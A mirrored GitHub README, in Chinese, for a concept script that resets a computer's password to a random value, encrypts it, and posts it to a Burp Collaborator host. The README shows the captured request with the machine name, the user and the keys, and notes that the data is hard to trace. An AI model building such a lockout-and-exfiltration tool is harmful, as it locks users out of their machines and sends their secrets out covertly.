Code Monkey home page Code Monkey logo

rsa_encrypt's Introduction

rsa_encrypt

计算机密码随机加密 概念脚本

设想下,使用随机数生成计算机密码,并使用AES+RSA公钥加密生成的随机数密码,发送到burp collaborator client。 burp collaborator client可以记录发送的详细数据,如下:

POST /11.txt HTTP/1.1
Host: oxpx4jh2y80jixiSaxc5pmyiu90zoo.burpcollaborator.net
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
INFO: NAME=LAPTOP-6PB1HSVN&USER=administrator
Content-Length: 427

AESKEY=b'zYnNqBf1APMjXZGTR2wyLrD0cupEQF6J'&AESIV=b'Pi4c9S2uGmRdFqwY'&RSAENCRYPT=b'YJ0Oz2aEqEmIcZ4azdHnicIkXaRJAML/2AD0aiG1D3VmQbXhAYIiYQz/wcq0e9yk2qyaMomai6Pc7/LG1+FN+KsFo1O4syDmaUos1xc6R5iOWgAhXLLpRnk8haSkDxHw3K6+yvlIyDySgTEv9FJZv6lBSRSSPW/n3REhgH1jk4D+Hi9FXe5gyR9JNqkjdXcEQn+RCsKwTB2X+l9AEOGpkfP6mOjz2jG8oS8lycbZdz0KzvdAeE/5oYGXUhFyDPO+f0vDuawUmw7Hpmk4jlTdzIyTZaGlutqSDM2a3/UBYjzkC8YjzvwtrExtWW36hp8DVsItM8XVygPu4nLhHZielQ=='

想要全程追踪、解密数据难度较大

rsa_encrypt's People

Contributors

wrysunny avatar

Stargazers

 avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.